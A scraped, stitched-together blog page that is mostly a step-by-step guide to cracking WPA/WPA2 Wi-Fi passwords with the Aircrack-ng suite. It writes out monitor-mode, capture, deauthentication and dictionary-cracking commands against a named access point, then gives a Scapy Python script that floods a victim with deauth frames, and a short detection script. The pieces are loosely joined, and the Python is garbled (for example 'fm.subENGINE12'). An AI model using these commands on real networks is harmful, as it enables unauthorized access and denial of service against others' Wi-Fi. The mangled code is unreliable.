5/28/2020 Deauth Wifi Aircrack For Mac
How to Hack WPA/WPA2 Wi Fi with Kali Linux. This wikiHow teaches you how to find out the password for a WPA or WPA2 network by hacking it with Kali Linux. Understand when you can legally hack Wi-Fi. In most regions, the only time you can.
![]() In this article, we will use Aircrack-Ng and dictionary attack method with encrypted password taken from the 4-step handshake process.
When Wi-Fi was first developed in the late 1990s, Wired Equivalent Privacy (WEP) was created to secure wireless communications, but it has many bugs and is easily cracked. For that reason, most wireless access points now use Wi-Fi Protected Access II with pre-shared key for wireless security, also known as WPA2-PSK. WPA2 uses encryption algorithm, AES is stronger, so it is difficult to crack, but not impossible. The weakness in WPA2-PSK system is that the encrypted password is shared during 4-way handshake (4-way handshake). When the client authenticates to the access point (AP), the client and AP perform a 4-way handshake to authenticate the user to the AP. This is the time to hack the password.
Picture 1
How to hack Wifi password with Aircrack-Ng download this picture here
In this article, we will use Aircrack-Ng and dictionary attack method with the password encrypted from the 4-step handshake process.
How to hack WiFi password with Aircrack-Ng
Step 1: Set up Wi-Fi adapter in Monitor Mode with Airmon-Ng
First, we need to use a wireless network adapter compatible with Kali Linux.
Picture 2
How to hack Wifi password with Aircrack-Ng download this picture here
This is similar to setting up a wired adapter in mixed mode (promiscuous mode). It allows to see all the wireless traffic going through. Open the Terminal window and type:
airmon-ng start wlan0
Picture 3
How to hack Wifi password with Aircrack-Ng download this picture here
Note, airmon-ng renames adapter wlan0 to mon0.
Step 2 : Get traffic information with Airodump-Ng
Now wireless adapter is in Monitor mode, so all wireless traffic can be seen. Get traffic information using the airodump-ng command.
This command takes all the traffic that the wireless adapter can see and displays important information about it such as BSSID (AP's MAC address), power, beacon frame number, data frame number, channel, speed , encryption (if any), and finally ESSID (SSID). Type the following command in the terminal:
airodump-ng mon0
Picture 4
How to hack Wifi password with Aircrack-Ng download this picture here
Note, all visible APs are listed at the top of the screen and the clients are listed at the bottom of the screen.
Step 3: Concentrate Airodump-Ng on an access point on a channel
The next step is to focus on one AP on one channel and collect important data from there. To do this need the BSSID and channel, open another Terminal window and type:
airodump-ng --bssid 08: 86: 30: 74: 22: 76 -c 6 --write WPAcrack mon0
Picture 5
How to hack Wifi password with Aircrack-Ng download this picture here ![]()
As shown in the screenshot above, focus on collecting data from an AP with Belkin276's ESSID on channel 6.
Step 4: Aireplay-Ng Deauth
In order to get encrypted passwords, we need to have an authentic client for the AP. If it is authenticated, we can remove authentication and the system will automatically confirm it, so that the encrypted password can be retrieved. Please open another terminal window and type:
aireplay-ng --deauth 100 -a 08: 86: 30: 74: 22: 76 mon0
Picture 6
How to hack Wifi password with Aircrack-Ng download this picture here
Step 5: The 4-way handshake process
In the previous step, when they re-authenticate the password, airodump-ng will try to retrieve the password during the 4-way handshake. Go back to the terminal window airodump-ng and check to see if it succeeded.
Picture 7
How to hack Wifi password with Aircrack-Ng download this picture here
If on the top right line has ' WPA handshake ' written, it means that the process of obtaining the encrypted password was successful.
Step 6: Now we have the encrypted password in the WPAcrack file. Run the file using a password file, here use the default password list named darkcOde. Now, crack the password by opening a terminal and typing:
aircrack-ng WPAcrack-01.cap -w / pentest / passwords / wordlists / darkc0de
Picture 8
How to hack Wifi password with Aircrack-Ng download this picture here
This process can be relatively slow and tedious. Depending on the length of the password list, you may have to wait a few minutes to a few days. When the password is found, it will appear on the screen. Remember, password files are very important. Try the default password file first and if it fails, proceed to a larger and more complete password file.
Maybe you want to know: How to hack Wifi passwords using Wifiphisher
I wish you all success!
Maybe you are interested
How to create secure passwords on Fastword
Account password is a very important component to secure your personal account to avoid hacking. There are many ways to create strong, unpredictable passwords to prevent the loss of personal accounts, such as hacked Facebook accounts. And you are also advised not to use characters such as date of birth, house number, and information relating to yourself as a password. Fastword is a website that...Read more »
Thanks for reading the post
How to hack Wifi password with Aircrack-NgPlease share this article to your friends
«120 passwords for free WiFi at airports around the world
How to speed up Internet connection with cFosSpeed»
Deauthentication attacks or Deauth attacks fall under the category of management frame attacks or simply session management and authentication attacks. Most of us are not aware of Deauthentication attacks or Deauth attacks.
So lets learn the basics of Deauthentication attacks or Deauth attacks. When a client wishes to disconnect from an Access Point, the client sends the deauthentication frame. Access Point also sends the deauthentication frame in the form of a reply. This is the normal process, but an attacker takes advantage of this process.
The attacker spoofs the MAC address of the victim and sends the deauth frame to AP on behalf of the victim; because of this, the connection with the client is dropped. The aireplay-ng program is the best tool to accomplish the deauth attack. In this section, you will learn how to carry out this attack by using Python.Now, let’s look at the following code:from scapy.all import.import sysinterface = “mon0”BSSID = rawinput(“Enter the MAC of AP “)victimmac = rawinput(“Enter the MAC of Victim “)frame= RadioTap/ Dot11(addr1=victimmac,addr2=BSSID, addr3=BSSID)/ Dot11Deauthsendp(frame,iface=interface, count= 1000, inter=.1)This code is very easy to understand. The frame= RadioTap/ Dot11(addr1=victimmac,addr2=BSSID, addr3=BSSID)/ Dot11Deauth statement creates the deauth packet.
From the very first diagram in this chapter, you can check these addresses. In the last sendp (frame,iface=interface, count= 1000, inter=.1) line, count gives the total number of packets sent, and inter indicates the interval between the two packets.The output of the deauth.py program is as follows:root@Lokesh Lucky:/wireless# python deauth.pyWARNING: No route found for IPv6 destination:: (no default route?)Enter the MAC of AP 0c:d2:b5:01:0f:e6Enter the MAC of Victim 88:53:2E:0A:75:3FThe aim of this attack is not only to perform a deauth attack but also to check the victim’s security system. IDS should have the capability to detect the deauth attack.
So far, there is no way of avoiding attack, but it can be detected.You can offer a solution to your client for this attack. A simple Python script can detect the deauth attack.
The following is the code for the detection:from scapy.all import.interface = ‘mon0’i=1def info(fm). If fm.haslayer(Dot11):if ((fm.type 0) & (fm.subENGINE12)):global iprint “Deauth detected “, ii=i 1sniff(iface=interface,prn=info)The preceding code is very easy to understand. Let’s look at the new things here. The fm.subENGINE12 statement indicates the deauth frame, and the globally declared i variable informs us of the packet counts.In order to check the attack, I have carried out the deauth attack.The output of the macd.py script is as follows:root@Lokesh Lucky:/wireless# python macd.pyWARNING: No route found for IPv6 destination:: (no default route?)Deauth detected 1Deauth detected 2Deauth detected 3Deauth detected 4Deauth detected 5Deauth detected 6Deauth detected 7Deauth detected 8By analyzing the packet count, you can detect whether it falls under the DoS attack or normal behavior. I hope you learned something valuable from this article.
![]() Comments are closed.
|
AuthorWrite something about yourself. No need to be fancy, just an overview. Archives
March 2023
Categories |